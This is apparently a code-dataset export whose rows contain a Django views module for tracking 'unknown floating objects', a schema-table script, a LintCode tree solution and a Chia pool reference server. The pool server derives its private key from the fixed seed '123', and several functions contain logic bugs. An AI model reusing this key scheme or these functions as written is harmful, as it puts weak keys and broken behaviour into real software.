"{0}: skipped, does not have an image extension such as .jp(e)g or .png.".format(
f
)
)
continue
ufo = Ufo(description="Auto upload", state="UNK")
try:
with z.open(f) as fh:
fp = str(uuid.uuid4()) + "." + extension
ufo.image.save(fp, fh)
except Exception as e:
logger.error("Error during zip extract: {}".format(e))
skipped.append(
"{0}: skipped, could not be extracted.".format(f)
)
continue
for f in ["description", "deadline", "dispose_by_date"]:
if form.cleaned_data[f]:
setattr(ufo, f, form.cleaned_data[f])
ufo.changeReason = "Part of a bulk upload by {}".format(
request.user
)
ufo.save()
lst.append(ufo)
try:
os.remove(tmpZip)
except:
logger.error("Error during cleanup of {}: {}".format(tmpZip, e))
if lst:
alertOwnersToChange(lst, request.user, [request.user.email])
return render(
request,
"ufo/upload.html",
{
"has_permission": request.user.is_authenticated,
"action": "Done",
"lst": lst,
"skipped": skipped,
},
)
return render(
request,
"ufo/upload.html",
{
"form": form,
"action": "Upload",
"has_permission": request.user.is_authenticated,
},
)
|
from django.shortcuts import render
from django.contrib.sites.shortcuts import get_current_site
from django.contrib.admin.sites import AdminSite
from django.template import loader
from django.http import HttpResponse
from django.conf import settings
from django.shortcuts import redirect
from django.views.generic import ListView, CreateView, UpdateView
from django.contrib.auth.decorators import login_required
from django import forms
from django.contrib.auth import login, authenticate
from django.shortcuts import render, redirect
from django.contrib.auth.tokens import PasswordResetTokenGenerator
from django.shortcuts import render
from django.views.decorators.csrf import csrf_protect
from django.db.models import Q
from simple_history.admin import SimpleHistoryAdmin
from django.template.loader import render_to_string, get_template
from django.core.mail import EmailMessage
from django.conf import settings
from django.contrib.admin.sites import AdminSite
from django.core.exceptions import ObjectDoesNotExist
from django.core.mail import EmailMultiAlternatives
from django.urls import reverse
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart
from ufo.utils import emailUfoInfo
import datetime
import uuid
import zipfile
import os
import re
import logging
logger = logging.getLogger(__name__)
from .models import Ufo
from .admin import UfoAdmin
from .forms import UfoForm, NewUfoForm, UfoZipUploadForm
from members.models import User
# Note - we do this here; rather than in the model its save() - as this
# lets admins change things through the database interface silently.
# Which can help when sheparding the community.
#
def alertOwnersToChange(items, userThatMadeTheChange=None, toinform=[]):
context = {
"user": userThatMadeTheChange,
"base": settings.BASE,
}
if userThatMadeTheChange:
toinform.append(userThatMadeTheChange.email)
if settings.ALSO_INFORM_EMAIL_ADDRESSES:
toinform.extend(settings.ALSO_INFORM_EMAIL_ADDRESSES)
return emailUfoInfo(items, "email_notification", toinform=[], context={})
def ufo_redirect(pk=None):
url = reverse("ufo")
if pk:
url = "{}#{}".format(url, pk)
return redirect(url)
def index(request, days=30):
lst = Ufo.objects.all()
if days > 0:
tooOld = datetime.date.today() - datetime.timedelta(days=days)
lst = lst.filter(Q(lastChange__gte=tooOld) | Q(state="UNK"))
context = {
"title": "Uknown Floating Objects",
"lst": lst,
"days": days,
"has_permission": request.user.is_authenticated,
}
return render(request, "ufo/index.html", context)
@login_required
def create(request):
form = NewUfoForm(request.POST or None, request.FILES, initial={"state": "UNK"})
if form.is_valid():
try:
item = form.save(commit=False)
item.state = "UNK"
if not item.description:
item.description = "Added by {}".format(request.user)
item.changeReason = "Created by {} through the self-service portal.".format(
request.user
)
item.save()
alertOwnersToChange(item, request.user, [item.owner.email])
return ufo_redirect(item.id)
except Exception as e:
logger.error(
"Unexpected error during initial save of new ufo: {}".format(e)
)
return HttpResponse(
"Something went wrong ??", status=500, content_type="text/plain"
)
context = {
"title": "Add an Uknown Floating Objects",
"form": form,
"action": "Add",
"has_permission": request.user.is_authenticated,
}
return render(request, "ufo/crud.html", context)
def show(request, pk):
try:
item = Ufo.objects.get(pk=pk)
except ObjectDoesNotExist as e:
return HttpResponse("UFO not found", status=404, content_type="text/plain")
context = {
"title": "Uknown Floating Objects",
"item": item,
"has_permission": request.user.is_authenticated,
}
return render(request, "ufo/view.html", context)
@login_required
def modify(request, pk):
try:
oitem = Ufo.objects.get(pk=pk)
except ObjectDoesNotExist as e:
return HttpResponse("UFO not found", status=404, content_type="text/plain")
toinform = []
if oitem.owner:
toinform.append(oitem.owner.email)
context = {
"title": "Update an Uknown Floating Objects",
"action": "Update",
"item": oitem,
"has_permission": request.user.is_authenticated,
}
if request.POST:
form = UfoForm(request.POST or None, request.FILES, instance=oitem)
if form.is_valid() and request.POST:
try:
item = form.save(commit=False)
item.changeReason = "Changed by {} via self service portal".format(
request.user
)
item.save()
except Exception as e:
logger.error("Unexpected error during update of ufo: {}".format(e))
if item.owner:
toinform.append(item.owner.email)
alertOwnersToChange([item], request.user, toinform)
context["item"] = item
return ufo_redirect(pk)
form = UfoForm(instance=oitem)
context["form"] = form
return render(request, "ufo/crud.html", context)
@login_required
def mine(request, pk):
try:
item = Ufo.objects.get(pk=pk)
except ObjectDoesNotExist as e:
return HttpResponse("UFO not found", status=404, content_type="text/plain")
item.changeReason = "claimed as 'mine' by {} via self service portal".format(
request.user
)
if item.owner != request.user:
alertOwnersToChange([item], request.user, [item.owner.email])
item.save()
return ufo_redirect(pk)
@login_required
# Limit this to admins ?
def delete(request, pk):
try:
item = Ufo.objects.get(pk=pk)
except ObjectDoesNotExist as e:
return HttpResponse("UFO not found", status=404, content_type="text/plain")
form = UfoForm(request.POST or None, instance=item)
for f in form.fields:
form.fields[f].disabled = True
if not request.POST:
context = {
"title": "Confirm delete of this UFO",
"label": "Confirm delete of this UFO",
"action": "Delete",
"is_logged_in": request.user.is_authenticated,
"user": request.user,
"form": form,
"item": item,
"delete": True,
}
return render(request, "ufo/crud.html", context)
if not form.is_valid():
return HttpResponse("Eh - confused ?!", status=403, content_type="text/plain")
try:
item.changeReason = "Deleted via the self-service interface by {0}".format(
request.user
)
item.save()
item.delete()
except Exception as e:
logger.error("Unexpected error during delete of item: {0}".format(e))
return HttpResponse("Box fail", status=400, content_type="text/plain")
return ufo_redirect()
@login_required
def upload_zip(request):
form = UfoZipUploadForm(request.POST or None, request.FILES)
if request.method == "POST":
if form.is_valid() and "zipfile" in request.FILES:
if request.FILES["zipfile"].size > settings.MAX_ZIPFILE:
return HttpResponse(
"Upload too large", status=500, content_type="text/plain"
)
tmpZip = settings.MEDIA_ROOT + "/ufozip-" + str(uuid.uuid4())
with open(tmpZip, "wb+") as dst:
for c in request.FILES["zipfile"].chunks():
dst.write(c)
skipped = []
lst = []
with zipfile.ZipFile(tmpZip, "r") as z:
for zi in z.infolist():
if zi.is_dir():
skipped.append("{0}: skipped, directory".format(f))
continue
f = zi.filename
if re.match("\..*", f):
skipped.append("{0}: skipped, hidden file".format(f))
continue
if re.match(".*/\.", f):
skipped.append("{0}: skipped, hidden file".format(f))
continue
if zi.file_size < settings.MIN_IMAGE_SIZE:
skipped.append("{0}: skipped, too small".format(f))
continue
if zi.file_size > settings.MAX_IMAGE_SIZE:
skipped.append("{0}: skipped, too large".format(f))
continue
extension = "raw"
if re.match(".*\.(jpg|jpeg)$", f, re.IGNORECASE):
extension = "jpg"
elif re.match(".*\.(png)$", f, re.IGNORECASE):
extension = "png"
else:
skipped.append(
"{0}: skipped, does not have an image extension such as .jp(e)g or .png.".format(
f
)
)
continue
ufo = Ufo(description="Auto upload", state="UNK")
try:
with z.open(f) as fh:
fp = str(uuid.uuid4()) + "." + extension
ufo.image.save(fp, fh)
except Exception as e:
logger.error("Error during zip extract: {}".format(e))
skipped.append(
"{0}: skipped, could not be extracted.".format(f)
)
continue
for f in ["description", "deadline", "dispose_by_date"]:
if form.cleaned_data[f]:
setattr(ufo, f, form.cleaned_data[f])
ufo.changeReason = "Part of a bulk upload by {}".format(
request.user
)
ufo.save()
lst.append(ufo)
try:
os.remove(tmpZip)
except:
logger.error("Error during cleanup of {}: {}".format(tmpZip, e))
if lst:
alertOwnersToChange(lst, request.user, [request.user.email])
return render(
request,
"ufo/upload.html",
{
"has_permission": request.user.is_authenticated,
"action": "Done",
"lst": lst,
"skipped": skipped,
},
)
return render(
request,
"ufo/upload.html",
{
"form": form,
"action": "Upload",
"has_permission": request.user.is_authenticated,
},
)
|
en
| 0.885799
|
# Note - we do this here; rather than in the model its save() - as this # lets admins change things through the database interface silently. # Which can help when sheparding the community. # #{}".format(url, pk) # Limit this to admins ?
| 1.694074
| 2
|
scripts/schema.py
|
OpenPDI/pdi
| 4
|
6628548
|
import json
import pathlib
import tabulate
data = pathlib.Path(__file__).parents[1] / "openpdi" / "meta" / "uof"
if __name__ == "__main__":
schema_path = data.joinpath("schema.json")
with open(schema_path, "r") as s:
columns = json.load(s)
rows = []
for col in sorted(columns["fields"], key = lambda i: i["label"]):
agencies = []
for d in data.glob("*/*.json"):
with open(d, "r") as a:
for agency in json.load(a):
if col["label"] in agency["columns"]:
agencies.append(agency["url"].split("/")[-2])
link = "[`{0}`](https://github.com/OpenPDI/data/releases/tag/{0})"
rows.append([
"`{0}`".format(col["label"]),
col["description"],
"`{0}`".format(col["example"].replace("|", "/")),
", ".join([link.format(f) for f in set(agencies)])
])
table = tabulate.tabulate(
rows,
[
"Column name",
"Column description",
"Example value",
"Reporting Agencies"
],
tablefmt="pipe",
)
print(table)
|
import json
import pathlib
import tabulate
data = pathlib.Path(__file__).parents[1] / "openpdi" / "meta" / "uof"
if __name__ == "__main__":
schema_path = data.joinpath("schema.json")
with open(schema_path, "r") as s:
columns = json.load(s)
rows = []
for col in sorted(columns["fields"], key = lambda i: i["label"]):
agencies = []
for d in data.glob("*/*.json"):
with open(d, "r") as a:
for agency in json.load(a):
if col["label"] in agency["columns"]:
agencies.append(agency["url"].split("/")[-2])
link = "[`{0}`](https://github.com/OpenPDI/data/releases/tag/{0})"
rows.append([
"`{0}`".format(col["label"]),
col["description"],
"`{0}`".format(col["example"].replace("|", "/")),
", ".join([link.format(f) for f in set(agencies)])
])
table = tabulate.tabulate(
rows,
[
"Column name",
"Column description",
"Example value",
"Reporting Agencies"
],
tablefmt="pipe",
)
print(table)
|
none
| 1
| 2.66662
| 3
|
|
lintcode/649.py
|
jianershi/algorithm
| 1
|
6628549
|
<filename>lintcode/649.py
"""
649. Binary Tree Upside Down
https://www.lintcode.com/problem/binary-tree-upside-down/description
"""
"""
Definition of TreeNode:
class TreeNode:
def __init__(self, val):
self.val = val
self.left, self.right = None, None
"""
class Solution:
"""
@param root: the root of binary tree
@return: new root
"""
def upsideDownBinaryTree(self, root):
# write your code here
root, _ = self.flip(root)
return root
def flip(self, root):
if not root: #处理原始数据传进来就是空的情况
return root, root
if not root.left and not root.right:
return root, root
new_root, right_leaf = self.flip(root.left)
right_leaf.left = root.right
right_leaf.right = root
root.right = None
root.left = None
return new_root, root
|
<filename>lintcode/649.py
"""
649. Binary Tree Upside Down
https://www.lintcode.com/problem/binary-tree-upside-down/description
"""
"""
Definition of TreeNode:
class TreeNode:
def __init__(self, val):
self.val = val
self.left, self.right = None, None
"""
class Solution:
"""
@param root: the root of binary tree
@return: new root
"""
def upsideDownBinaryTree(self, root):
# write your code here
root, _ = self.flip(root)
return root
def flip(self, root):
if not root: #处理原始数据传进来就是空的情况
return root, root
if not root.left and not root.right:
return root, root
new_root, right_leaf = self.flip(root.left)
right_leaf.left = root.right
right_leaf.right = root
root.right = None
root.left = None
return new_root, root
|
en
| 0.575345
|
649. Binary Tree Upside Down https://www.lintcode.com/problem/binary-tree-upside-down/description Definition of TreeNode: class TreeNode: def __init__(self, val): self.val = val self.left, self.right = None, None @param root: the root of binary tree @return: new root # write your code here #处理原始数据传进来就是空的情况
| 3.419286
| 3
|
pool/pool_server.py
|
setar/pool-reference
| 1
|
6628550
|
<gh_stars>1-10
import asyncio
import logging
import time
import traceback
from typing import Dict, Callable, Optional
import aiohttp
from blspy import AugSchemeMPL, PrivateKey
from aiohttp import web
from chia.protocols.pool_protocol import SubmitPartial, PoolInfo
from chia.util.hash import std_hash
from chia.consensus.default_constants import DEFAULT_CONSTANTS
from chia.consensus.constants import ConsensusConstants
from chia.util.json_util import obj_to_response
from chia.util.ints import uint64, uint32
from chia.util.default_root import DEFAULT_ROOT_PATH
from chia.util.config import load_config
from error_codes import PoolErr
from store import FarmerRecord
from pool import Pool
def allow_cors(response: web.Response) -> web.Response:
response.headers["Access-Control-Allow-Origin"] = "*"
return response
class PoolServer:
def __init__(self, private_key: PrivateKey, config: Dict, constants: ConsensusConstants):
self.log = logging.getLogger(__name__)
self.pool = Pool(private_key, config, constants)
async def start(self):
await self.pool.start()
async def stop(self):
await self.pool.stop()
def wrap_http_handler(self, f) -> Callable:
async def inner(request) -> aiohttp.web.Response:
try:
res_object = await f(request)
if res_object is None:
res_object = {}
except Exception as e:
tb = traceback.format_exc()
self.log.warning(f"Error while handling message: {tb}")
if len(e.args) > 0:
res_object = {"error_code": PoolErr.SERVER_EXCEPTION.value, "error_message": f"{e.args[0]}"}
else:
res_object = {"error_code": PoolErr.SERVER_EXCEPTION.value, "error_message": f"{e}"}
return allow_cors(obj_to_response(res_object))
return allow_cors(res_object)
return inner
async def index(self, _) -> web.Response:
return web.Response(text="Chia reference pool")
async def get_pool_info(self, _) -> web.Response:
res: PoolInfo = PoolInfo(
"The Reference Pool",
"https://www.chia.net/img/chia_logo.svg",
uint64(self.pool.min_difficulty),
uint32(self.pool.relative_lock_height),
"1.0.0",
str(self.pool.pool_fee),
"(example) The Reference Pool allows you to pool with low fees, paying out daily using Chia.",
self.pool.default_target_puzzle_hash,
)
return obj_to_response(res)
async def submit_partial(self, request_obj) -> web.Response:
start_time = time.time()
request = await request_obj.json()
# TODO(pool): add rate limiting
partial: SubmitPartial = SubmitPartial.from_json_dict(request)
time_received_partial = uint64(int(time.time()))
# It's important that on the first request from this farmer, the default difficulty is used. Changing the
# difficulty requires a few minutes, otherwise farmers can abuse by setting the difficulty right under the
# proof that they found.
farmer_record: Optional[FarmerRecord] = await self.pool.store.get_farmer_record(partial.payload.launcher_id)
if farmer_record is not None:
current_difficulty: uint64 = farmer_record.difficulty
balance = farmer_record.points
else:
current_difficulty = self.pool.default_difficulty
balance = uint64(0)
async def await_and_call(cor, *args):
# 10 seconds gives our node some time to get the signage point, in case we are slightly slowed down
await asyncio.sleep(10)
res = await cor(args)
self.pool.log.info(f"Delayed response: {res}")
res_dict = await self.pool.process_partial(partial, time_received_partial, balance, current_difficulty, True)
if "error_code" in res_dict and "error_code" == PoolErr.NOT_FOUND.value:
asyncio.create_task(
await_and_call(
self.pool.process_partial, partial, time_received_partial, balance, current_difficulty, False
)
)
self.pool.log.info(
f"Returning {res_dict}, time: {time.time() - start_time} " f"singleton: {request['payload']['launcher_id']}"
)
return obj_to_response(res_dict)
server: PoolServer = None
runner = None
async def start_pool_server():
global server
global runner
private_key: PrivateKey = AugSchemeMPL.key_gen(std_hash(b"123"))
config = load_config(DEFAULT_ROOT_PATH, "config.yaml")
overrides = config["network_overrides"]["constants"][config["selected_network"]]
constants: ConsensusConstants = DEFAULT_CONSTANTS.replace_str_to_bytes(**overrides)
server = PoolServer(private_key, config, constants)
await server.start()
# TODO(pool): support TLS
app = web.Application()
app.add_routes(
[
web.get("/", server.wrap_http_handler(server.index)),
web.get("/pool_info", server.wrap_http_handler(server.get_pool_info)),
web.post("/partial", server.wrap_http_handler(server.submit_partial)),
]
)
runner = aiohttp.web.AppRunner(app, access_log=None)
await runner.setup()
site = aiohttp.web.TCPSite(runner, "0.0.0.0", int(80))
await site.start()
await asyncio.sleep(10000000)
async def stop():
await server.stop()
await runner.cleanup()
if __name__ == "__main__":
try:
asyncio.run(start_pool_server())
except KeyboardInterrupt:
asyncio.run(stop())
|
import asyncio
import logging
import time
import traceback
from typing import Dict, Callable, Optional
import aiohttp
from blspy import AugSchemeMPL, PrivateKey
from aiohttp import web
from chia.protocols.pool_protocol import SubmitPartial, PoolInfo
from chia.util.hash import std_hash
from chia.consensus.default_constants import DEFAULT_CONSTANTS
from chia.consensus.constants import ConsensusConstants
from chia.util.json_util import obj_to_response
from chia.util.ints import uint64, uint32
from chia.util.default_root import DEFAULT_ROOT_PATH
from chia.util.config import load_config
from error_codes import PoolErr
from store import FarmerRecord
from pool import Pool
def allow_cors(response: web.Response) -> web.Response:
response.headers["Access-Control-Allow-Origin"] = "*"
return response
class PoolServer:
def __init__(self, private_key: PrivateKey, config: Dict, constants: ConsensusConstants):
self.log = logging.getLogger(__name__)
self.pool = Pool(private_key, config, constants)
async def start(self):
await self.pool.start()
async def stop(self):
await self.pool.stop()
def wrap_http_handler(self, f) -> Callable:
async def inner(request) -> aiohttp.web.Response:
try:
res_object = await f(request)
if res_object is None:
res_object = {}
except Exception as e:
tb = traceback.format_exc()
self.log.warning(f"Error while handling message: {tb}")
if len(e.args) > 0:
res_object = {"error_code": PoolErr.SERVER_EXCEPTION.value, "error_message": f"{e.args[0]}"}
else:
res_object = {"error_code": PoolErr.SERVER_EXCEPTION.value, "error_message": f"{e}"}
return allow_cors(obj_to_response(res_object))
return allow_cors(res_object)
return inner
async def index(self, _) -> web.Response:
return web.Response(text="Chia reference pool")
async def get_pool_info(self, _) -> web.Response:
res: PoolInfo = PoolInfo(
"The Reference Pool",
"https://www.chia.net/img/chia_logo.svg",
uint64(self.pool.min_difficulty),
uint32(self.pool.relative_lock_height),
"1.0.0",
str(self.pool.pool_fee),
"(example) The Reference Pool allows you to pool with low fees, paying out daily using Chia.",
self.pool.default_target_puzzle_hash,
)
return obj_to_response(res)
async def submit_partial(self, request_obj) -> web.Response:
start_time = time.time()
request = await request_obj.json()
# TODO(pool): add rate limiting
partial: SubmitPartial = SubmitPartial.from_json_dict(request)
time_received_partial = uint64(int(time.time()))
# It's important that on the first request from this farmer, the default difficulty is used. Changing the
# difficulty requires a few minutes, otherwise farmers can abuse by setting the difficulty right under the
# proof that they found.
farmer_record: Optional[FarmerRecord] = await self.pool.store.get_farmer_record(partial.payload.launcher_id)
if farmer_record is not None:
current_difficulty: uint64 = farmer_record.difficulty
balance = farmer_record.points
else:
current_difficulty = self.pool.default_difficulty
balance = uint64(0)
async def await_and_call(cor, *args):
# 10 seconds gives our node some time to get the signage point, in case we are slightly slowed down
await asyncio.sleep(10)
res = await cor(args)
self.pool.log.info(f"Delayed response: {res}")
res_dict = await self.pool.process_partial(partial, time_received_partial, balance, current_difficulty, True)
if "error_code" in res_dict and "error_code" == PoolErr.NOT_FOUND.value:
asyncio.create_task(
await_and_call(
self.pool.process_partial, partial, time_received_partial, balance, current_difficulty, False
)
)
self.pool.log.info(
f"Returning {res_dict}, time: {time.time() - start_time} " f"singleton: {request['payload']['launcher_id']}"
)
return obj_to_response(res_dict)
server: PoolServer = None
runner = None
async def start_pool_server():
global server
global runner
private_key: PrivateKey = AugSchemeMPL.key_gen(std_hash(b"123"))
config = load_config(DEFAULT_ROOT_PATH, "config.yaml")
overrides = config["network_overrides"]["constants"][config["selected_network"]]
constants: ConsensusConstants = DEFAULT_CONSTANTS.replace_str_to_bytes(**overrides)
server = PoolServer(private_key, config, constants)
await server.start()
# TODO(pool): support TLS
app = web.Application()
app.add_routes(
[
web.get("/", server.wrap_http_handler(server.index)),
web.get("/pool_info", server.wrap_http_handler(server.get_pool_info)),
web.post("/partial", server.wrap_http_handler(server.submit_partial)),
]
)
runner = aiohttp.web.AppRunner(app, access_log=None)
await runner.setup()
site = aiohttp.web.TCPSite(runner, "0.0.0.0", int(80))
await site.start()
await asyncio.sleep(10000000)
async def stop():
await server.stop()
await runner.cleanup()
if __name__ == "__main__":
try:
asyncio.run(start_pool_server())
except KeyboardInterrupt:
asyncio.run(stop())
|
en
| 0.920021
|
# TODO(pool): add rate limiting # It's important that on the first request from this farmer, the default difficulty is used. Changing the # difficulty requires a few minutes, otherwise farmers can abuse by setting the difficulty right under the # proof that they found. # 10 seconds gives our node some time to get the signage point, in case we are slightly slowed down # TODO(pool): support TLS
| 1.961497
| 2
|